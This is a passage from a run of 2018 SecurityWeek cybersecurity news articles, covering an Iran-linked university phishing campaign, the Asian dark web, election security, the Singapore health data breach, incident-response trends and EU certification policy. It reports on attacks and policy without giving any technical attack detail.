SecureWorks security researchers have discovered that a new, large phishing campaign targeting universities is similar to previous cyber operations by an actor associated with the Iranian government.

The campaign involved the use of sixteen domains that contained more than 300 spoofed websites and login pages for 76 universities in 14 countries, including Australia, Canada, China, Israel, Japan, Switzerland, Turkey, the United Kingdom, and the United States.

Many of the spoofed domains, SecureWorks says, referenced the targeted universities’ online library systems, suggesting that the actors behind the campaign were interested in accessing those resources. Not all domains were accessible during analysis.

Victims who entered their login credentials into the fake login pages were redirected to the legitimate websites. Once there, they were either automatically logged into a valid session or asked for the login credentials again, SecureWorks explains.

Many of the domains were registered between May and August 2018, the most recent of them on August 19. Most of the identified domains resolved to the same IP address and DNS name server.

The attacks share infrastructure with a previously observed campaign associated with the Iran-linked COBALT DICKENS hackers. In March, the United States indicted the Mabna Institute and nine Iranian nationals in connection with the group’s activity between 2013 and 2017.

According to the U.S. Department of Justice, the hackers targeted the accounts of more than 100,000 university professors worldwide and managed to compromise around 8,000 of them. The actors were also said to have stolen 31 terabytes of academic data and intellectual property.

“Many threat groups do not change their tactics despite public disclosures, and analysis suggests that COBALT DICKENS may be responsible for the university targeting despite the indictments of some members,” SecureWorks says.

It is not uncommon for threat actors to target universities when looking to steal intellectual property. Not only are universities more difficult to secure compared to finance or healthcare organizations, but they are also highly attractive because they develop cutting-edge research and can attract global researchers and students, SecureWorks points out.


A Guided Tour of the Asian Dark Web
9.8.2018 securityweek Cyber


The Asian dark web is not well known. Most people just think of Russia when thinking about underground hacking forums. To gain a better understanding of Asian onion sites and black markets, researchers from IntSights embarked on a six-month long investigation and analysis.

The results, published this week at Black Hat, show a diverse, culturally sensitive and wider than perhaps expected Asian dark web. Along with the report, IntSights' director of threat research, Itay Kozuch, took SecurityWeek on a guided tour of the Asian dark web.

We started at the Hidden Wiki, a South Korean page that bookmarks other sites in the dark web all over the world. "It's been live for a few years, and is being maintained on a regular basis," explained Kozuch. The page is organized in sections and even provides an 'editor's choice' selection. It provides links to whatever the existing or budding hacker or underworld character might be looking for: bank accounts, card details, advice, drugs, porn, fake passports and IDs, UK driving licenses, firearms and more.

"It's a good place to start a foray into the dark web," said Kozuch. Despite this expansive index onto blacker parts of the dark web, the IntSights report says, "At the moment, there are no significant threat actors that operate out of South Korea."

Our next stop was deeper into the dark web: Mushroom, a Chinese black-market site specializing in the sale of drugs. "The most important feature for the researcher," continued Kozuch, "are the prices. They are all in Chinese Yuan, not as we usually see in dark websites, bitcoin or other cryptocurrency." This is because cryptocurrencies are forbidden in China and the site primarily serves Chinese nationals -- although it does offer advice on how to obtain bitcoin and is willing to ship produce outside of China. The price is also 30% to 40% lower than is typically found in western black markets.

From there we moved to Japan. The Japanese dark web has one major difference to other parts: it is remarkably polite. "Many Japanese users view it as an alternate universe," says the report, "where they can express themselves and have harmless discussions, just behind the mask of an anonymous avatar. It is not uncommon to see diaries and blogs on the Japanese dark web." It is more about obtaining things, such as drugs and porn, than about facilitating hacking. One even asks the visitor to suggest a price for the products.

We visited the Japanese branch of Anonymous, which is a bit of an exception. "Its primary purpose is protest against the Japanese government on environmental issues," explained Kozuch. Two current ops are Hope Japan and Hope Fukushima. "Anonymous accuses the Japanese government of hiding information about what really happened in the nuclear plant, and the extent of pollution in the seas around Japan." The website directly calls for attacks against Japanese government websites, and Anonymous is willing to provide what is necessary -- methodologies for DDoS, SQLi, XSS and other attack vectors.

We then visited another Japanese language site that is a bit different -- a site that buys and sells information, focusing on military intelligence, documents, protocols, science, and technology. "What's really remarkable," added Kozuch, "is that this site is not typically Japanese in flavor. Japanese sites usually handle drugs and porn. After analyzing the style and content, we came to the conclusion that this is not a Japanese website at all. The Japanese would never be so direct and forthright. We suspect that the people behind it are North Korean, which has its problems with Japan." The report adds that it may be a North Korean (or Chinese) group "that is attempting to gather intelligence for some attack on or operation in Japan."

We also visited another Anonymous site in Thailand (this one is offering a free database of 30,000 FBI and DHS officers stolen in 2016); and a hacking forum/black market in Indonesia (providing free downloads of malware and exploits).

The main focus, however, was on China, and we visited three more websites. Surprisingly, none of these are onion sites. They are dark sites to anybody outside of China because of the Chinese firewall, but in the clear web to Chinese nationals. The first offers DDoS as a packaged service -- a fairly unique offering selling different options of strength and duration. "The largest offering," Kozuch pointed out, "is for a 500 Gb attack with unlimited connections."

The second, known as QQ, is a hacking forum designed as a combination of different social media platforms and providing communication tools such as QQ groups, QQ forums and private chatrooms.

The last was Hack80, a hacking forum more in line with the better known Russian underground forums. "It offers everything you might find in the traditional Russian hacking forums," said Kozuch: "bitcoin mining tutorials, hacker toolkits, malware and so on. You can ask about and get almost anything -- if you're Chinese, of course. You cannot ask questions or get answers in English." This isn't surprising since the site is in the clear web, and thus only visible to Chinese nationals (IntSights was using a very specific VPN for the research and this tour).

Kozuch believes it is time for the West to take the Chinese dark web more seriously. "We usually like to look at the North Koreans and the Russians as the primary attackers; but I believe that the Chinese offer is more sophisticated with more capability than we have realized. Many of the next threats that we are going to see will come from China."

The fact that so many dark Chinese sites are on the Chinese clear web raises the question of collusion between the hackers and the government. Kozuch does not believe that the existence of hacking sites in the clear web automatically means they are permitted by the government, or that the hackers work for the government. It is perfectly feasible for these sites to hide in plain sight given the size of the Chinese internet.

"I think there is a big element of private cybercrime groups that operate from China that we were simply not aware of," he told SecurityWeek. "It is more comfortable to blame the APT groups we already know about, but I think this research shows how much knowledge and how much capability that private groups have, and how they communicate and what kind of tools they are using."

He suspects that we often automatically blame APT groups simply because the attack comes from China; but the perpetrator may well be an unknown private group. "Usually, APT groups (with the exception of North Korea) are not after money -- they're after intelligence or to steal intellectual property. I believe that in some cases there are Chinese threat actors that we simply aren't aware of." As in Russia, many of the Chinese threat actors will focus on targets outside of China so as not to draw the attention -- and ire -- of the local police.

But this doesn't mean there is no collusion at all between the criminal groups and the Chinese government. "I haven't found any evidence that private groups are sub-contracting for the government," he continued, "but I really believe that it is happening -- like in many other places around the world. Sometimes the government doesn't have all the capabilities it needs, so it uses sub-contractors who will deliver the skills provided the government allows them to continue their own operations outside of China. There are examples of known Chinese hackers that are now running their own security firms. Nobody turns from crime life to become whitehats for no reason and without any consequences. I really believe that there are all kinds of groups that enjoy government protection because they provide services to the government when it needs it. Give and take rules."

"The Asian dark web," concludes the IntSights research, "is relatively small compared to its counterparts in Western countries, such as the United States and Europe. However, this doesn't mean that it poses less of a threat. In fact, due to the laws and political motivations of these countries, the risk to non-Asian companies is significantly higher."

Israel-born startup IntSights Cyber Intelligence raised $17 million in a Series C funding round led by Tola Capital in June 2018, bringing the total capital raised by the firm to $41.3 million. IntSights was founded in 2015 by Alon Arvatz, Gal Ben David, and Guy Nizan.


RiskRecon Raises $25 Million to Grow Third-Party Cyber Risk Management Business
8.8.2018 securityweek Cyber

Salt Lake City-based RiskRecon, which offers solutions to help companies manage third-party cyber risk, has raised $25 million in Series B financing, the company announced Wednesday.

The Series B round brings the total amount raised by RiskRecon to more than $40 million.

RiskRecon helps its customers control third-party risk by providing assessments of each third-party’s security practices, which can be used to establish a base level of trust and identify specific areas for further discussion and investigation.

The company, which has nearly tripled its customer base in the last twelve months, says the additional funding will be used to support increasing demand for its third-party cyber risk management solutions.

“Though most businesses have no choice but to obtain internet services, security solutions, and a range of other business-critical technologies from third-party providers, they do have a choice in how they manage the associated security risks,” noted SecurityWeek contributor Josh Lefkowitz in a recent column.

“Third-party risk management is the process of holding enterprises accountable to good security practices,” explained Kelly White, RiskRecon’s CEO and Co-founder. “As you improve the risk management of your third parties, you improve the collective security of the Internet.”

The Series B round was led by Accel and joined by existing investors Dell Technologies Capital, General Catalyst, and Fidelity’s F-Prime Capital. Several existing individual investors also participated in the round.

“As we talk to our CISOs, we see a growing need for third-party risk management as enterprises have become more intertwined with third-party service providers,” said Nate Niparko, a partner at Accel.

“Conducting thorough due diligence on a prospective vendor’s security is essential,” Lefkowitz added in his April 2018 column. “The most secure and successful vendor relationships are rooted in preparation and transparency. Thoroughly understanding all facets of a vendor’s security program, implementing additional controls as needed to appropriately safeguard your business’s assets, and being prepared to respond to future incidents can go a long way toward reducing business risks associated with any vendor relationship.”


Campaigns on Their Own as Cyber Threats Roil Midterms
6.8.2018 securityweek  Cyber

NEW YORK (AP) — Kamala Harris has been the target of social media misinformation campaigns since she became a U.S. senator.

Every month for the last 18 months, her office has discovered on average between three and five fake Facebook profiles pretending to be hers, according to a Harris aide. It's unclear who creates the pages, which are often designed to mislead American voters about the ambitious Democratic senator's policies and positions.

The aide spoke on the condition of anonymity, like more than a half dozen campaign officials contacted for this story, for fear of attracting unwanted attention from adversaries or scrutiny on the Senate office's evolving cybersecurity protocols.

Such internet mischief has become commonplace in U.S. politics. Facebook announced earlier this week that it uncovered "sophisticated" efforts, possibly linked to Russia, to influence U.S. politics on its platforms. Senior intelligence officials declared Thursday that foreign adversaries continue waging a quiet war against U.S. campaigns and election systems.

Still, one thing has become clear: With the midterm elections just three months away, campaigns are largely on their own in the increasingly challenging task of protecting sensitive information and countering false or misleading content on social media.

The Democratic National Committee has worked to strengthen its own internal security protocols and encouraged state parties to do the same, according to Raffi Krikorian, who previously worked for Uber and Twitter and now serves as the DNC's chief technology officer.

But in an interview, he acknowledged there are limits to how much the national party can protect the thousands of Democratic campaigns across the country.

"We're providing as much assistance to campaigns as we can, but there's only so much we can do," Krikorian said.

"For all the high-level campaigns I'm worried, but at least there are people to talk to," he continued. "The mid-sized campaigns are at least getting technical volunteers, but the truly down-ballot campaigns, that's where the state parties and coordinated campaigns can help, but there's no doubt that this is an uphill battle when we're dealing with a foreign adversary."

Officials in both political parties have intensified cybersecurity efforts, although the known cases of interference have so far overwhelmingly focused on Democrats.

The DNC now has a staff of 40 on its technical team, led by Krikorian and other Silicon Valley veterans hired in the months after Russians hacked the party's email system and released a trove of damaging messages in the months before President Donald Trump's 2016 victory.

Top U.S. intelligence and homeland security officials raised new alarms Thursday about outside efforts to influence the 2018 and 2020 elections during a White House press briefing.

Homeland Security chief Kirstjen Nielsen said: "Our democracy is in the crosshairs," while Director of National Intelligence Dan Coats added: "We continue to see a pervasive messaging campaign by Russia to try to weaken and divide the United States."

Facebook said it removed 32 accounts from its site and Instagram because they were involved in "coordinated" political behavior and appeared to be fake. Nearly 300,000 people followed at least one of the accounts, which featured names such as "Black Elevation" and "Resisters" and were designed to manipulate Americans with particular ethnic, cultural or political identities.

In many cases, House and Senate political campaigns said they're just beginning to adopt basic internal security protocols, such as two-step verification for all email, storage and social media accounts and encrypted messaging services such as Wickr.

There is no protocol in place for campaigns or national parties to monitor broader social media misinformation campaigns, however. Nor is there any sign that law enforcement is playing a proactive role to protect campaigns from meddling on a day-to-day basis.

The FBI has set up a Foreign Influence Task Force and intelligence agencies are collecting information on Russian aggression, but campaigns report no regular contact with law enforcement officials.

"At the end of the day, the U.S. government is not putting any type of a bubble around any (campaign). They do not have the authority, capacity or capability to do it," said Shawn Henry, a former senior FBI official who now leads the cybersecurity firm CrowdStrike, which works with political campaigns. "NSA is not sitting in the ISPs filtering out malicious traffic."

Henry added: "They've got to take pro-active actions themselves."

Earlier this month, Microsoft said it discovered a fake domain had been set up as the landing page for phishing attacks by a hacking group believed to have links to Russian intelligence. A Microsoft spokesman said this week that additional analysis confirmed the attempted attacks occurred in late 2017 and targeted multiple accounts associated with the offices of two legislators running for re-election. Microsoft did not name the lawmakers.

Sen. Claire McCaskill, D-Mo., said Russian hackers tried unsuccessfully to infiltrate her Senate computer network in 2017. Former Democratic U.S. Rep. Brad Ashford of Nebraska also recently confirmed that his 2016 campaign emails had been hacked by Russian agents.

Ashford, who narrowly lost his seat to Republican Don Bacon that year, said hackers obtained all of his campaign email correspondence with the Democratic Congressional Campaign Committee. He said he was notified of the breach in late July or early August 2016 by House Democratic Leader Nancy Pelosi's office.

Ashford has said he doesn't believe any of the stolen information ever went to Bacon or the Republican Party, and he doesn't know whether it made a difference in his race. He did face a series of anonymous political attacks on social media.

By their very nature, U.S. political campaigns can be a challenge to defend from a cybersecurity standpoint. They are essentially pop-up organizations that rely heavily on volunteers and are focused on a singular task — winning. In addition, high-level IT expertise costs money and campaigns typically run on tight budgets.

Some 2018 House campaigns have yet to hire basic communications staffers.

In the case of California Sen. Harris, who is considered a 2020 presidential prospect, her office plans to continue rooting out fake social media profiles on its own. They have had no contact with the FBI. They have reported the issue to Facebook in every case — not the other way around.

"It's on the forefront of everybody's mind," said Patrick McHugh, a former Senate campaign official who now leads the Democratic-aligned super PAC Priorities USA.

He acknowledged the tremendous challenge for many campaigns.

"All it takes is one person on a campaign to make a mistake," McHugh said. "You're up against a foreign country. That's a pretty big adversary that can and will go to all ends to get in."


US, Australia Work to Improve Cyber Capabilities
26.7.2018 securityweek Cyber

The United States and Australia have signed an agreement that will enable the two allies to conduct research and development to advance their combined cyber capabilities, officials said Tuesday.

Nowhere "is the need for innovation more critical than in cyber, which continues to be a pervasive threat to our militaries and to our businesses," Australian Defence Minister Marise Payne said at a US-Australian summit in California.

US Defense Secretary Jim Mattis said the two countries had signed a memorandum of understanding "to deepen cybersecurity cooperation."

The move comes amid ongoing hacking thefts of sensitive information from military networks, and Russia's continued attempts to subvert democracy in America and elsewhere.

On a separate topic, an Australian reporter asked Mattis whether he thought the Australian navy should conduct a so-called "freedom of navigation" operation to challenge Chinese claims of sovereignty on militarized islets in the South China Sea.

The longstanding issue poses a dilemma for Canberra, with Australian lawmakers debating how much the country should align itself with its longstanding ally America, or pay more heed to the desires of China, its biggest trade partner.

"As far as freedom of navigation decisions by Australia, that's a sovereign decision by a sovereign state," Mattis said.

"We'll just leave that decision with the people of Australia, which is exactly where it belongs."

US Secretary of State Mike Pompeo and his Australian counterpart Julie Bishop also attended the annual summit.

Pompeo was asked about US views of holding Russia to account over its role in the 2014 shootdown of Malaysia Airlines flight MH-17 over Ukraine, when 298 people, including 38 Australian citizens and residents, were killed.

"We need the Russians to continue to be held accountable for that," Pompeo said.

"We take this matter seriously and we committed over these last two days, as we have for the last months, to continue to support every effort through the Joint Investigative Team to hold the perpetrators for this heinous activity accountable."


State-Actors Likely Behind Singapore Cyberattack: Experts
23.7.2018 securityweek Cyber

State-actors were likely behind Singapore's biggest ever cyberattack to date, security experts say, citing the scale and sophistication of the hack which hit medical data of about a quarter of the population.

The city-state announced Friday that hackers had broken into a government database and stolen the health records of 1.5 million Singaporeans, including Prime Minister Lee Hsien Loong who was specifically targeted in the "unprecedented" attack.

Singapore's health minister said the strike was "a deliberate, targeted, and well-planned cyberattack and not the work of casual hackers or criminal gangs".

While officials refused to comment on the identity of the hackers citing "operational security", experts told AFP that the complexity of the attack and its focus on high-profile targets like the prime minister pointed to the hand of a state-actor.

"A cyber espionage threat actor could leverage disclosure of sensitive health information... to coerce an individual in (a) position of interest to conduct espionage" on its behalf, said Eric Hoh, Asia-Pacific president of cybersecurity firm FireEye.

Hoh told national broadcaster Channel NewsAsia that the attack was an "advanced persistent threat".

"The nature of such attacks are that they are conducted by nation states using very advanced tools," he said.

"They tend to be well resourced, well-funded and highly sophisticated."

Russia -- which is accused of meddling in the US presidential election -- China, Iran and North Korea are believed to have the capability to carry out such attacks.

Analysts, however, would not be drawn into speculation on who might be behind the hack or why Singapore was targeted.

The attack started two weeks after the wealthy city-state hosted the historic summit between US President Donald Trump and North Korean leader Kim Jong Un.

Jeff Middleton, chief executive of cybersecurity consultancy Lantium, said healthcare data is of particular interest to hackers because it can be used to blackmail people in positions of power.

"A lot of information about a person's health can be gleaned from the medications that they take," Middleton told AFP Saturday.

"Any non-public health information could be used for extortion. Russian spy services have a long history of doing this."

Medical information, like personal data, can also be easily monetised on criminal forums, said Sanjay Aurora, Asia-Pacific managing director of Darktrace.

"Beyond making a quick buck, a more sinister reason to attack would be to cause widespread disruption and systemic damage to the healthcare service -- as a fundamental part of critical infrastructure -- or to undermine trust in a nation's competency to keep personal data safe," he told AFP.

- Hyper-connected -

Today, cybercriminals are targeting more than just individuals or banks, said Shahnawaz Backer, regional security specialist at F5 Networks.

"Government services, from healthcare to education, are targets that are just as likely, as evidenced by the recent attacks in Singapore," Backer said.

"As Singapore embraces the digital revolution, security breaches are bound to happen. Our growing digital footprint is growing every day, and enterprises need to take strict measures to safeguard and protect their data."

Wealthy Singapore is hyper-connected and on a drive to digitise government records and essential services, including medical records which public hospitals and clinics can share via a centralised database.

But authorities have put the brakes on these plans while they investigate the breach. A former judge will head an inquiry looking into the hack.

Singapore officials have cautioned against jumping to conclusions about the attackers.

"With regard to the prime minister's data and why he was targeted, I would say that it's perhaps best not to speculate what the attacker had in mind," said David Koh, head of Singapore's Cyber Security Agency.

The hackers used a computer infected with malware to gain access to the database between June 27 and July 4 before administrators spotted "unusual activity", authorities said.

The government says it fends off thousands of cyberattacks every day and has long warned of breaches by actors ranging from high-school students in their bedrooms to nation-states.

Earlier this month, US intelligence chief Dan Coats described Russia, China, Iran and North Korea as the "worst offenders" when it came to attacks on American "digital infrastructure".


A Cyber Axis of Evil is Rewriting the Cyber Kill Chain
22.7.2018 securityweek Cyber

Survey of Incident Responders Shows That Businesses Need to Re-architect Cybersecurity

The cyber kill chain employed by advanced adversaries is changing. Defenders need to evolve their defensive strategies to meet the new challenge; and they need to develop silent hunting skills.

A new study from Carbon Black queried 37 incident response firms that use its threat hunting tool to gain insight into what is happening after an attacker has breached the network. "The inspiration for this report," Tom Kellermann, the author and chief cybersecurity officer at Carbon Black told SecurityWeek, "was, I was tired of seeing reports that are focused on just the vector of attack -- how they got in versus how they stay in. There has been a dramatic shift in how cybercriminals operate -- they have moved from burglary to home invasion, and we now need to be asking different questions. The adversaries are typically inside networks for months."

Key statistics from the report picked out by Kellermann include the predominance of Russia and China as adversaries. Eighty-one percent of respondents highlighted Russia, and 76% highlighted China. Thirty-five percent say that the end goal is espionage.

Sixty percent of the attacks involve lateral movement, indicating that attacks are no longer smash and grab incidents -- adversaries are now intending to stick around for the long game. This is confirmed by the appearance of incident response countermeasures. Nearly half of the respondents have seen instances of counter-incident response. Sixty-four percent have seen instances of secondary C2 being used on a sleep cycle during their IR engagements. Thirty-six percent of attackers use the victim for island hopping; that is, as a supply chain attack. And -- perhaps worryingly -- 10% have witnessed non-ransomware destruction.

"I think the destruction figure is quite worrying if it grows," Kellermann told SecurityWeek; noting that there are already signs that it is doing so. He suggested three primary motivations: activism (possibly patriotic), revenge (for being discovered), and the destruction of forensic evidence. "There's a fundamental lesson we need to take away from this," he said: "we have to become more clandestine and more quiet when we hunt the adversary in our homes. We can no longer shout out, 'I know you're in my house; I've called the police'. That is exactly what Crowdstrike did when it was responsible for investigating the DNC breach, it was too loud in its incident response which is why the Russians dug and burrowed in deeper and deeper -- and that was evidenced in the indictments."

The biggest single takeaway that Kellermann has from this survey is that the way to counter the new long-term, advanced and evasive incursions is to develop silent hunting techniques. If hunting is too noisy, the adversary will simply burrow deeper, employ incident-response countermeasures, or simply destroy the network and leave.

"This evolution coincides with mounting geopolitical tensions," suggests the report. "Nation-states such as Russia, China, Iran and North Korea are actively operationalizing and supporting technologically advanced cyber militias."

Kellermann believes that this new level of attack sophistication is down to the increasing level of nation-state hacking -- although the hacking itself may be done by a national militia rather than direct government employees. "We're seeing cybercriminals act as cyber militias for nation states," he explained.

Take Russia and the GRU units indicted by Deputy Attorney General Rosenstein as an example. "Those GRU units typically in the past didn't have any real level of cyber-attack sophistication. The Silicon Valley of cyber-attack sophistication in Russia was St Petersburg -- so they called upon great cybercriminals like Alexsey Belan and Evgeniy Bogachev to essentially arm them with the greatest zero-day attack code and exploit kits in addition to showing them how to morph and change their kill chain."

The Chinese adversaries are also learning and adapting. "The Chinese," he said, "having learned from the mistakes of their past, where they never practiced good operational security and they were typically too loud when they broke into networks... well, they're becoming much more clandestine and much more elegant in the way they attack corporations. Particularly," he added, "in using island hopping -- as evidenced by the Cloud Hopper campaign where they targeted the MSPs of a dozen major corporations in the West. After compromising the MSPs they then leapfrogged into the corporate networks via their cloud infrastructure for the purposes of economic espionage."

The coincidence of changing and more advanced attacks with the rise of nation state actors is compelling; but the suggestion that it is primarily Russia and China comes down to the accuracy of attribution.

"This attribution comes from the incident response responders to the survey," says Kellermann. "These folks typically worked in British or US intelligence or law enforcement communities; and they understand the fingerprints, the TTPs associated with specific threat actor groups, and the modus operandi. Not only that, you can typically see the C&Cs and the secondary C&Cs leveraging back to infrastructure that is operated or controlled by specific entities."

Kellermann believes there really is -- effectively -- a cyber axis of evil, primarily comprising Russia, China, North Korea, and to a lesser extent, Iran. The first three have an unwritten operational agreement not to target each other. "None of these three will hack the others, and at the same time they are benefitting from each other's colonization of wide swathes of the West."

Russia and North Korea are particularly close. "Both Russia and North Korea are counteracting economic sanctions imposed by the West with cybercrime against the financial sector," he said. "North Korea itself has become much more adept and sophisticated with their cyber-attacks as they are mirroring the Russian kill chain, and they are using more and more exploits and more and more custom malware. Just as the North Korean missile systems are typically based on Russian missiles, so you have the same amount of tech transfer in cyber capabilities."

He sees no reduction in cyber-attacks from any of these countries, and expects South China Sea tensions and the potential for global trade wars to simply exacerbate the problem. "In fact," he said, "the new group Hidden Cobra has been quite prolific -- you just don't hear much about them because the financial institution victims are trying to keep this conversation quiet. But Hidden Cobra is the greatest testament to the advancement of cyber capabilities in North Korea."

Nor does he exclude Iran from this group, pointing out that as long ago as the Stuxnet issue, it was Russia that Iran turned to for, and received from, cyber assistance. There are even suggestions that Russian experts analyzed Stuxnet and returned it to Iran in the form of the original Shamoon malware used against Saudi Aramco.

But Kellermann doesn't think an understanding of the source of the attacks is as important as an understanding of how they are being operated. "I really think that the indications of counter incident response are the powerful statistics; and that 36% of the attacks are not directed against the initial victim -- basically, after they've done stealing from you they're going to use your network to target people that trust you. That has to be something we are acutely aware of and cognizant of in how we structure business partnerships, and in how we secure our information supply chain going forward."

He feels that the U.S. is currently suffering under an Administration that is not sufficiently focused on cyber security. "Not only does the US not even have a Cyber Czar, but this Administration has not taken cyber security seriously -- as evidenced by the rapid retirement rate of professionals who would have been lifers under a different administration. I am incredibly concerned that we're dealing with an adversary that has already colonized wide swathes of British and American infrastructure, and we're really fighting someone from the inside out."

He believes that the real message coming from this survey of incident responders is that business needs to re-architect its cybersecurity. "We need to change the architectural model away from a castle-like structure and more towards that of a prison, where we can force the adversary to be resource constrained, where we inhibit their capacity to move laterally and we hunt them and monitor them without them knowing that we're doing so. That's the type of environment we need to migrate to -- I call that environment 'intrusion suppression'."

To achieve this, he believes that business must move to silent hunting. "This could be done with iron boxing, modern whitelisting, next gen AV that includes endpoint detection and response, and deception technology. Hunt tools need to be more widely deployed. Memory augmentation should be employed, and adaptable authentication based on the level of risk can enforce 2 or 3 factor authentication with a biometric live challenge/response, all depending on the level of risk. Existing outward-facing network defenses are largely failing. The modern network has really evolved to cloud and mobility which makes the security of the endpoints paramount, and the capacity to record and monitor all activity on the endpoints is absolutely quintessential to success."


DOJ Cybersecurity Task Force Outlines Plans for Protecting Elections
22.7.2018 securityweek Cyber

The U.S. Justice Department’s Cyber-Digital Task Force made public its first report on Thursday, covering the threat to elections, cybercrime schemes, and various other topics.

The role of the Cyber-Digital Task Force, announced in February by the Attorney General, is to help the Department of Justice find ways to combat cyber threats and become more efficient in this area.

The task force focuses on election interference, critical infrastructure disruptions, use of the Internet for spreading violent ideologies and recruiting followers, botnets, the use of technology designed to hide criminal activities, and the theft of sensitive data.

The first chapter of the 156-page report focuses on what the Attorney General describes as “one of the most pressing cyber-enabled threats” confronting the U.S., specifically “malign foreign influence operations” and their impact on elections and other democratic institutions.

The types of threats described in the report include operations targeting voting machines, voter registration databases and other election infrastructure; operations targeting political entities; and covert influence operations whose goal is to harm political organizations and public officials.

The report specifically names Russia and cites the recent indictments related to the hacking of the Democratic National Committee (DNC) and attempts to influence the 2016 presidential election.

Authorities are also concerned about disinformation operations that abuse social media and other forums to influence public opinion and sow division, and overt influence operations that involve lobbyists and foreign media.

The report also focuses on the upcoming midterm elections, which intelligence officials believe will be targeted by Russia. The Kremlin is expected to apply lessons learned from the campaign aimed at the 2016 election.

The task force has outlined plans to combat threats to the 2018 midterm elections, including ballot fraud, for which authorities believe the risk is real, despite no evidence of successful attempts.

The report also describes a framework for countering malign foreign influence operations aimed at the midterm elections.

Microsoft representatives revealed this week that the company already identified election-related hacking attempts. The tech giant spotted some phishing websites that appeared to be aimed at three unnamed congressional candidates.

“The Department of Justice plays an important role in combating foreign efforts to interfere in our elections, but it cannot alone solve the problem. There are limits to the Department’s role—and the role of the U.S. government—in addressing foreign influence operations aimed at sowing discord and undermining our Nation’s institutions,” the task force noted. “Combating foreign influence operations requires a whole-of-society approach that relies on coordinated actions by federal, State, and local government agencies; support from potential victims and the private sector; and the active engagement of an informed public.”

The next two chapters of the report are dedicated to cybercrime schemes, including damage to computer systems, fraud, data theft, threats to privacy (e.g. sextortion), and critical infrastructure attacks.

Chapter 4 of the report shows how the FBI responds to cyber threats, and Chapter 5 describes the Department of Justice’s efforts on training and managing its workforce.

The complete report is available from the DOJ in PDF format.


Proposed EU Cybersecurity Product Certification Scheme Has Global Effects
19.7.2018 securityweek Cyber

The European Union is active in passing cybersecurity legislation ostensibly for the European Union but with worldwide ramifications. The General Data Protection Regulation (GDPR), and the Payment Services Directive 2 (PSD2) are recent examples. This process is similar on a global scale to California on a U.S. federal scale -- the respective markets are so important that vendors tend to comply generally.

There is more coming from the EU: the proposed Cybersecurity Act (9350/18) (PDF). On July 10, the proposal passed one of the major hurdles for new legislation when it was approved by the European Parliament's Industry Committee by 55 votes to five with one abstention. The key features of the proposal are to give more authority, budget and responsibility to the European Union Agency for Network and Information Security (ENISA); and to develop "European cybersecurity certification schemes for the purpose of ensuring an adequate level of cybersecurity of ICT processes, products and services in the Union."

The likelihood of the proposal proceeding to binding legislation can be gauged by the Industry Committee's reaction: it seeks to strengthen the proposal by making the certification mandatory for the critical infrastructure industries (the original proposal does not require certification, suggesting it should be voluntary). At this stage we do not know the details of the final outcome, but we can be fairly certain that there will be a new unified European certification scheme designed, developed and operated by ENISA.

The scope of the certification scheme is wide. Title III, paragraph 2 of the Act states, "The European cybersecurity certification framework defines a mechanism to establish European cybersecurity certification schemes and to attest that the ICT processes, products and services that have been evaluated in accordance with such schemes comply with specified security requirements with the aim to protect the availability, authenticity, integrity or confidentiality of stored or transmitted or processed data or the functions or services offered by, or accessible via, those products, processes, and services throughout their life cycle." It covers both traditional computer devices and the connected devices that comprise the Internet of Things (IoT).

The intention seems to be for ENISA to develop three levels of product assurance: basic, substantial and high.

The Cybersecurity Act generates mixed feelings, especially among non-EU companies operating or trading with Europe. There have been, and still are, many different security product certification schemes worldwide; and some feel that this will be just another burden placed on device manufacturers. Ilia Kolochenko, CEO of High-Tech Bridge is unsure of the need for a new scheme.

"Based on the information currently available about the ENISA certification," he told SecurityWeek, "I cannot see any substantially new or significantly better approach to cybersecurity or privacy compared to numerous already existing certifications, regulations or international standards such as ISO 27001."

The danger in new, locally-based, requirements is that they can further balkanize any attempts at global harmonization -- and given current global political and economic tensions, the result could do more harm than good. "In light of the escalating tariff war between the US and Europe," Kolochenko continued, "further segmentation of cybersecurity certifications and accreditations will inevitably bring more confusion and add unnecessary complexity -- let alone Russia or China with their own rules of the game. Different communities of experts will compete to make their standard slightly better, instead of joining their efforts to bring a unified global set of simple but efficient rules."

In August 2017, the IOT Cybersecurity Coalition wrote to the European Commission offering advice and voicing concerns. For example, it urges the EU to 'leverage existing best practices and global industry-led standards'.

"This avoids burdening multinational enterprises with the requirements of conflicting jurisdictions while facilitating interoperability, compatibility, reliability, and security on a global scale." This is part of the 'regulations inhibit innovation' argument. The Coalition fears that existing voluntary efforts "would be stymied by the slow and unitary nature of the EU standards development process should the EU move forward with mandatory standards, testing, and labelling requirements. Meanwhile, threat actors will continue to innovate unhindered."

Kolochenko touches on this concern. "One should be careful not to overestimate the value of a certification. Certification is merely a beautiful facade, behind which there is a reality. We have seen quite a few breaches of PCI DSS certified merchants and similarly notorious cases." He is concerned that industry will spend more time on ensuring that products they use are correctly certified than on ensuring their digital premises are really secure. "Paper security may undermine practical security," he said.

The Coalition considers the potential for a false sense of security based on trust labels that could potentially have been issued several years earlier to be a concern. "Specifically," it says, "we remain concerned that pushing for generic or blanket cybersecurity labelling of IoT products could result in counterproductive technology mandates, new market access barriers, or roadblocks to innovation without necessarily bringing any real security or privacy benefits that could not otherwise be achieved on the basis of already existing instruments."

In February this year, AmCham EU (the American Chamber of Commerce to the European Union, claiming to be the voice of American business in Europe) published its own critique of the Cybersecurity Act. It welcomes the plan to convert ENISA into a permanent EU cybersecurity agency with greater power and resources, but urges the agency to strengthen its collaboration with industry "in an inclusive and transparent way."

AmCham has major reservations over the effect of certification on industry. "The framework should be voluntary and market-driven in nature as companies should be able to develop the security system features best for their unique risk situation... The proposal should also take into account the possibility of self-declaration."

Kolochenko doesn't think this is likely -- or, if initially possible, that it will necessarily remain so. "Of course, it’s a question of how the certification will be used and where it will be mandatory, but one may reasonably assume that European governmental entities and some companies will require it -- and prefer it to NIST or any foreign standards that have existed for more than a decade."

Transparency -- or its lack -- is as much a concern for AmCham as it is for the IOT Cybersecurity Coalition. "The proposed process lacks provisions for adequate transparency and openness, and is ultimately not reflecting the provisions and best practices under the WTO Agreement on Technical Barriers to Trade."

Some concerns seem to have been met. "The limitation of the applicability of certifications to a maximum of three years under Article 48.6 is particularly problematic," says AmCham. The current draft proposal has struck out "a maximum period of three years" and replaced it with "the period defined by the particular certification scheme". Nevertheless, this concern links back to the 'false sense of security' concern: a product may have been in compliance when it was tested, but how can you guarantee it is still in compliance, or not vulnerable to a newly discovered zero-day vulnerability today?

Indeed, this raises a further legal or at least moral complication. If a product fails to meet its description, there is potential for legal action against the manufacturer. But if a product has been 'guaranteed' by ENISA certification and still fails, who is liable: the manufacturer, ENISA or the European Commission?

